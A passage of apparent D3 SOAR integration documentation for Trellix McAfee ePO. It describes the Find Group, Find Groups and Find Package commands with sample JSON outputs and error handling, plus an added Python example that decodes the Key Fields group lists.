| ENDP_AM_1000 | Endpoint Security Threat Prevention: Custom On-Demand Scan | Run_ODS_CWS | 11 | 147 | Endpoint Security Threat Prevention |

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including the Failure Indicator, Status Code, and Message. These details can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
|---|---|---|
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Find Client Task failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system, which can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission settings in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

Find Client Task failed.

Status Code: 401.

Message: Unauthorized.

Find Group

Retrieves group information based on the provided search text.

Input

| Input Parameter | Required/Optional | Description | Example |
|---|---|---|---|
| Search Text | Optional | The search text defining the condition to retrieve group information. | AD Domain Controllers |

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "groupId": 7,
        "groupPath": "My Organization\\Servers\\AD Domain Controllers"
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "groupId": 7,
        "groupPath": "My Organization\\Servers\\AD Domain Controllers"
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[{\\\"groupId\\\":2,\\\"groupPath\\\":\\\"My Organization\\\"},{\\\"groupId\\\":3,\\\"groupPath\\\":\\\"My Organization\\\\\\\\Lost and Found\\\"},{\\\"groupId\\\":4,\\\"groupPath\\\":\\\"My Organization\\\\\\\\Lost and Found\\\\\\\\WORKGROUP\\\"},{\\\"groupId\\\":5,\\\"groupPath\\\":\\\"My Organization\\\\\\\\d3cyber7.local\\\"},{\\\"groupId\\\":6,\\\"groupPath\\\":\\\"My Organization\\\\\\\\Lost and Found\\\\\\\\d3cyber7.local\\\"}]\\r\\n\"",
    "groupId": "\"[\\r\\n\\t\\t\\t7\\r\\n\\t\\t]\"",
    "groupPath": "\"[\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Servers\\\\\\\\AD Domain Controllers\\\"\\r\\n\\t\\t]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

| groupId | groupPath |
|---|---|
| 7 | My Organization\Servers\AD Domain Controllers |

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including the Failure Indicator, Status Code, and Message. These details can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
|---|---|---|
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Find Group failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system, which can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission settings in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

Find Group failed.

Status Code: 401.

Message: Unauthorized.

Find Groups

Retrieves a list of all groups.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "groupId": 2,
        "groupPath": "My Organization"
    },
    {
        "groupId": 3,
        "groupPath": "My Organization\\Lost and Found"
    },
    {
        "groupId": 4,
        "groupPath": "My Organization\\Laptops"
    },
    {
        "groupId": 5,
        "groupPath": "My Organization\\Workstations"
    },
    {
        "groupId": 6,
        "groupPath": "My Organization\\Servers"
    },
    {
        "groupId": 7,
        "groupPath": "My Organization\\Servers\\AD Domain Controllers"
    },
    {
        "groupId": 8,
        "groupPath": "My Organization\\Servers\\DHCP and WINS Servers"
    },
    {
        "groupId": 9,
        "groupPath": "My Organization\\Servers\\Mail Servers"
    },
    {
        "groupId": 10,
        "groupPath": "My Organization\\Servers\\Sharepoint Servers"
    },
    {
        "groupId": 11,
        "groupPath": "My Organization\\Servers\\SQL Servers"
    },
    {
        "groupId": 13,
        "groupPath": "My Organization\\Lost and Found\\QA"
    },
    {
        "groupId": 14,
        "groupPath": "My Organization\\Lost and Found\\WORKGROUP"
    },
    {
        "groupId": 15,
        "groupPath": "My Organization\\My Group"
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "groupId": 2,
        "groupPath": "My Organization"
    },
    {
        "groupId": 3,
        "groupPath": "My Organization\\Lost and Found"
    },
    {
        "groupId": 4,
        "groupPath": "My Organization\\Laptops"
    },
    {
        "groupId": 5,
        "groupPath": "My Organization\\Workstations"
    },
    {
        "groupId": 6,
        "groupPath": "My Organization\\Servers"
    },
    {
        "groupId": 7,
        "groupPath": "My Organization\\Servers\\AD Domain Controllers"
    },
    {
        "groupId": 8,
        "groupPath": "My Organization\\Servers\\DHCP and WINS Servers"
    },
    {
        "groupId": 9,
        "groupPath": "My Organization\\Servers\\Mail Servers"
    },
    {
        "groupId": 10,
        "groupPath": "My Organization\\Servers\\Sharepoint Servers"
    },
    {
        "groupId": 11,
        "groupPath": "My Organization\\Servers\\SQL Servers"
    },
    {
        "groupId": 13,
        "groupPath": "My Organization\\Lost and Found\\QA"
    },
    {
        "groupId": 14,
        "groupPath": "My Organization\\Lost and Found\\WORKGROUP"
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "groupIds": "\"[\\r\\n\\t\\t\\t2,\\r\\n\\t\\t\\t3,\\r\\n\\t\\t\\t4,\\r\\n\\t\\t\\t5,\\r\\n\\t\\t\\t6,\\r\\n\\t\\t\\t7,\\r\\n\\t\\t\\t8,\\r\\n\\t\\t\\t9,\\r\\n\\t\\t\\t10,\\r\\n\\t\\t\\t11,\\r\\n\\t\\t\\t13,\\r\\n\\t\\t\\t14,\\r\\n\\t\\t\\t15,\\r\\n\\t\\t\\t27,\\r\\n\\t\\t\\t28,\\r\\n\\t\\t\\t29,\\r\\n\\t\\t\\t30,\\r\\n\\t\\t\\t31,\\r\\n\\t\\t\\t32,\\r\\n\\t\\t\\t33,\\r\\n\\t\\t\\t34,\\r\\n\\t\\t\\t35,\\r\\n\\t\\t\\t36,\\r\\n\\t\\t\\t37,\\r\\n\\t\\t\\t38,\\r\\n\\t\\t\\t39,\\r\\n\\t\\t\\t40,\\r\\n\\t\\t\\t41,\\r\\n\\t\\t\\t42,\\r\\n\\t\\t\\t43,\\r\\n\\t\\t\\t44,\\r\\n\\t\\t\\t45,\\r\\n\\t\\t\\t46,\\r\\n\\t\\t\\t47,\\r\\n\\t\\t\\t48,\\r\\n\\t\\t\\t49,\\r\\n\\t\\t\\t51\\r\\n\\t\\t]\"",
    "groupPaths": "\"[\\r\\n\\t\\t\\t\\\"My Organization\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Lost and Found\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Laptops\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Workstations\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Servers\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Servers\\\\\\\\AD Domain Controllers\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Servers\\\\\\\\DHCP and WINS Servers\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Servers\\\\\\\\Mail Servers\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Servers\\\\\\\\Sharepoint Servers\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Servers\\\\\\\\SQL Servers\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Lost and Found\\\\\\\\QA\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Lost and Found\\\\\\\\WORKGROUP\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\My Group\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Timmy-Group (2)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\My Group 2\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\My Group 3\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\eu-north-1\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\Asia Pacific (Mumbai)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\eu-west-3\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\EU (London)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\EU (Ireland)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\Asia Pacific (Seoul)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\Asia Pacific (Tokyo)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\South America (Sao Paulo)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\Canada (Central)\\\",\\r\\n\\t\\t\\t\\\"My 
Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\Asia Pacific (Singapore)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\Asia Pacific (Sydney)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\EU (Frankfurt)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\US East (N. Virginia)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\US East (Ohio)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\US East (Ohio)\\\\\\\\us-east-2a\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\US East (Ohio)\\\\\\\\us-east-2b\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\US West (N. California)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\US West (Oregon)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\My Group 4\\\"\\r\\n\\t\\t]\""
}
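The Key Fields sample above stores each list as a JSON string that has been encoded more than once. The following is an added example, not part of the D3 or Trellix documentation: it unwraps those layers and pairs `groupIds` with `groupPaths` so a later playbook task acts on the intended System Tree group. The function names and the shortened sample are constructed for illustration.

```python
import json

# Constructed sample in the same multiply-encoded shape as the Key Fields
# sample on this page, shortened to four groups.
SAMPLE_KEY_FIELDS_JSON = r'''
{
  "groupIds": "\"[\\r\\n\\t\\t\\t6,\\r\\n\\t\\t\\t7,\\r\\n\\t\\t\\t15,\\r\\n\\t\\t\\t28\\r\\n\\t\\t]\"",
  "groupPaths": "\"[\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Servers\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\Servers\\\\\\\\AD Domain Controllers\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\My Group\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\My Group 2\\\"\\r\\n\\t\\t]\""
}
'''
KEY_FIELDS = json.loads(SAMPLE_KEY_FIELDS_JSON)


def _looks_encoded(value):
    """True when a string still looks like a JSON string, array or object."""
    return isinstance(value, str) and value.strip()[:1] in ('"', "[", "{")


def decode_key_field(value, max_layers=5):
    """Peel JSON encoding layers until a non-string (or plain text) remains.

    Plain values such as "Successful" are returned unchanged, because only
    strings that start with a quote, '[' or '{' are treated as encoded.
    """
    for _ in range(max_layers):
        if not _looks_encoded(value):
            return value
        try:
            value = json.loads(value)
        except json.JSONDecodeError:
            return value  # looked like JSON but is ordinary text
    if _looks_encoded(value):
        raise ValueError("more encoding layers than expected")
    return value


def group_index(key_fields):
    """Return {groupId: groupPath}, refusing misaligned or malformed lists."""
    ids = decode_key_field(key_fields["groupIds"])
    paths = decode_key_field(key_fields["groupPaths"])
    if not isinstance(ids, list) or not isinstance(paths, list):
        raise TypeError("groupIds and groupPaths must decode to lists")
    if len(ids) != len(paths):
        # Zipping lists of different length would attach paths to wrong IDs.
        raise ValueError("groupIds and groupPaths differ in length")
    if not all(isinstance(i, int) and not isinstance(i, bool) for i in ids):
        raise TypeError("every groupId must be an integer")
    if not all(isinstance(p, str) for p in paths):
        raise TypeError("every groupPath must be a string")
    if len(set(ids)) != len(ids):
        raise ValueError("duplicate groupId in Key Fields")
    return dict(zip(ids, paths))


def groups_under(index, parent_path):
    """IDs of parent_path and its descendants, matched on whole path segments.

    A plain startswith() on "My Organization\\My Group" would also match
    "My Organization\\My Group 2"; appending the separator prevents that.
    """
    parent = parent_path.rstrip("\\")
    prefix = parent + "\\"
    return sorted(
        gid for gid, path in index.items()
        if path == parent or path.startswith(prefix)
    )


if __name__ == "__main__":
    idx = group_index(KEY_FIELDS)
    for gid in groups_under(idx, "My Organization\\Servers"):
        print(gid, idx[gid])
```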
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

| groupId | groupPath |
| --- | --- |
| 2 | My Organization |
| 3 | My Organization\Lost and Found |
| 4 | My Organization\Laptops |
| 5 | My Organization\Workstations |
| 6 | My Organization\Servers |
| 7 | My Organization\Servers\AD Domain Controllers |
| 8 | My Organization\Servers\DHCP and WINS Servers |
| 9 | My Organization\Servers\Mail Servers |
| 10 | My Organization\Servers\Sharepoint Servers |
| 11 | My Organization\Servers\SQL Servers |
| 13 | My Organization\Lost and Found\QA |
| 14 | My Organization\Lost and Found\WORKGROUP |
| 15 | My Organization\My Group |

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including the Failure Indicator, Status Code, and Message. These details can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
| --- | --- | --- |
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Find Groups failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

Find Groups failed.

Status Code: 401.

Message: Unauthorized.

Find Package

Retrieves packages based on the provided search text.

Input

| Input Parameter | Required/Optional | Description | Example |
| --- | --- | --- | --- |
| Search Text | Optional | The search text defining the condition to retrieve packages. | all |

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
  {
  "existsInCurrent": null,
  "distributionType": "Licensed",
  "existsInPrevious": null,
  "hidden": false,
  "productID": "*****",
  "productDetectionPlatformID": "***",
  "checkinDate": "2018-02-14T13****:****:****:***::****-****:****:****:***::****",
  "buildNumber": "623",
  "databaseAutoId": 0,
  "packageType": "Install",
  "productName": "Product Improvement Program",
  "signerName": "McAfee",
  "evaluation": false,
  "hashCode": "1425209253",
  "id": "***************************************",
  "keyType": 0,
  "conflictingPackageItems": [],
  "signingKeyHash": "*****=",
  "deploymentPath": null,
  "unknownDistributionType": false,
  "licensed": true,
  "existsInEvaluation": null,
  "packageId": "*****_Current_Install_0000_1.6.0_***3",
  "dependencyProductID": null,
  "packageTotalSize": "2763",
  "applicableForGlobalUpdating": false,
  "packageLangID": "0000",
  "hotFixVersion": "623",
  "productDetectionProductVersion": "1.6.0",
  "revokedStatus": false,
  "managedPkgDependencyList": null,
  "engineVersion64": "",
  "packageBranch": "Current",
  "productPlatform": null
  },
  {
  "existsInCurrent": null,
  "distributionType": "licensed",
  "existsInPrevious": null,
  "hidden": false,
  "productID": "*****",
  "productDetectionPlatformID": "*****",
  "checkinDate": "2018-02-14T13:14:35-08:00",
  "buildNumber": "619",
  "databaseAutoId": 0,
  "packageType": "Install",
  "productName": "Endpoint Security Threat Prevention",
  "signerName": "McAfee",
  "evaluation": false,
  "hashCode": "325877289",
  "id": "***************************************",
  "keyType": 0,
  "conflictingPackageItems": [],
  "signingKeyHash": "w+*****=",
  "deploymentPath": null,
  "unknownDistributionType": false,
  "licensed": true,
  "existsInEvaluation": null,
  "packageId": "ENDP_AM_1020_Current_Install_0000_10.2.0_*****",
  "dependencyProductID": "******",
  "packageTotalSize": "43331",
  "applicableForGlobalUpdating": false,
  "packageLangID": "0000",
  "hotFixVersion": "619",
  "productDetectionProductVersion": "10.2.0",
  "revokedStatus": false,
  "managedPkgDependencyList": null,
  "engineVersion64": "",
  "packageBranch": "Current",
  "productPlatform": null
  },
  {
  "existsInCurrent": null,
  "distributionType": "licensed",
  "existsInPrevious": null,
  "hidden": false,
  "productID": "*****",
  "productDetectionPlatformID": "*****",
  "checkinDate": "2018-02-14T13:14:53-08:00",
  "buildNumber": "361",
  "databaseAutoId": 0,
  "packageType": "Install",
  "productName": "Endpoint Security Firewall",
  "signerName": "McAfee",
  "evaluation": false,
  "hashCode": "-1329182882",
  "id": "***************************************",
  "keyType": 0,
  "conflictingPackageItems": [],
  "signingKeyHash": "w+*****=",
  "deploymentPath": null,
  "unknownDistributionType": false,
  "licensed": true,
  "existsInEvaluation": null,
  "packageId": "******Current_Install_0000_10.2.0_*****",
  "dependencyProductID": "*****",
  "packageTotalSize": "16164",
  "applicableForGlobalUpdating": false,
  "packageLangID": "0000",
  "hotFixVersion": "361",
  "productDetectionProductVersion": "10.2.0",
  "revokedStatus": false,
  "managedPkgDependencyList": null,
  "engineVersion64": "",
  "packageBranch": "Current",
  "productPlatform": null
  }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
  {
  "existsInCurrent": null,
  "distributionType": "Licensed",
  "existsInPrevious": null,
  "hidden": false,
  "productID": "*****",
  "productDetectionPlatformID": "***",
  "checkinDate": "2018-02-14T13****:****:****:***::****-****:****:****:***::****",
  "buildNumber": "623",
  "databaseAutoId": 0,
  "packageType": "Install",
  "productName": "Product Improvement Program",
  "signerName": "McAfee",
  "evaluation": false,
  "hashCode": "1425209253",
  "id": "***************************************",
  "keyType": 0,
  "conflictingPackageItems": [],
  "signingKeyHash": "*****=",
  "deploymentPath": null,
  "unknownDistributionType": false,
  "licensed": true,
  "existsInEvaluation": null,
  "packageId": "*****_Current_Install_0000_1.6.0_***3",
  "dependencyProductID": null,
  "packageTotalSize": "2763",
  "applicableForGlobalUpdating": false,
  "packageLangID": "0000",
  "hotFixVersion": "623",
  "productDetectionProductVersion": "1.6.0",
  "revokedStatus": false,
  "managedPkgDependencyList": null,
  "engineVersion64": "",
  "packageBranch": "Current",
  "productPlatform": null
  },
  {
  "existsInCurrent": null,
  "distributionType": "licensed",
  "existsInPrevious": null,
  "hidden": false,
  "productID": "*****",
  "productDetectionPlatformID": "*****",
  "checkinDate": "2018-02-14T13:14:35-08:00",
  "buildNumber": "619",
  "databaseAutoId": 0,
  "packageType": "Install",
  "productName": "Endpoint Security Threat Prevention",
  "signerName": "McAfee",
  "evaluation": false,
  "hashCode": "325877289",
  "id": "***************************************",
  "keyType": 0,
  "conflictingPackageItems": [],
  "signingKeyHash": "w+*****=",
  "deploymentPath": null,
  "unknownDistributionType": false,
  "licensed": true,
  "existsInEvaluation": null,
  "packageId": "ENDP_AM_1020_Current_Install_0000_10.2.0_*****",
  "dependencyProductID": "******",
  "packageTotalSize": "43331",
  "applicableForGlobalUpdating": false,
  "packageLangID": "0000",
  "hotFixVersion": "619",
  "productDetectionProductVersion": "10.2.0",
  "revokedStatus": false,
  "managedPkgDependencyList": null,
  "engineVersion64": "",
  "packageBranch": "Current",
  "productPlatform": null
  },
  {
  "existsInCurrent": null,
  "distributionType": "licensed",
  "existsInPrevious": null,
  "hidden": false,
  "productID": "*****",
  "productDetectionPlatformID": "*****",
  "checkinDate": "2018-02-14T13:14:53-08:00",
  "buildNumber": "361",
  "databaseAutoId": 0,
  "packageType": "Install",
  "productName": "Endpoint Security Firewall",
  "signerName": "McAfee",
  "evaluation": false,
  "hashCode": "-1329182882",
  "id": "***************************************",
  "keyType": 0,
  "conflictingPackageItems": [],
  "signingKeyHash": "w+*****=",
  "deploymentPath": null,
  "unknownDistributionType": false,
  "licensed": true,
  "existsInEvaluation": null,
  "packageId": "******Current_Install_0000_10.2.0_*****",
  "dependencyProductID": "*****",
  "packageTotalSize": "16164",
  "applicableForGlobalUpdating": false,
  "packageLangID": "0000",
  "hotFixVersion": "361",
  "productDetectionProductVersion": "10.2.0",
  "revokedStatus": false,
  "managedPkgDependencyList": null,
  "engineVersion64": "",
  "packageBranch": "Current",
  "productPlatform": null
  }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
  "checkinDate": "\"[\\r\\n\\t\\t\\t\\\"2018-02-14T13****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-12-24T23****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2020-02-13T17****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T11****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T11****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-05-31T16****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-05-31T16****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-05-31T16****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-05-31T16****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-05-31T16****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-05-31T17****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-05-31T17****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T09****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T09****:****:****:***::****-****:****:****:***::****\\\",\
\r\\n\\t\\t\\t\\\"2019-06-04T09****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-10-27T16****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-12-24T23****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-10-27T16****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-12-24T23****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-06-06T15****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-06-10T13****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-12-25T00****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-12-25T00****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-12-25T00****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-12-25T00****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-06-10T14****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-10-22T20****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-10-22T20****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-10-22T21****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-10-27T16****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T18****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-12-03T15****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-12-03T15****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-12-24T23****:****:****:***::****-****:****:****:***::****\\\"\\r\\n\\t\\t]\"",
  "distributionType": "\"[\\r\\n\\t\\t\\t\\\"Licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n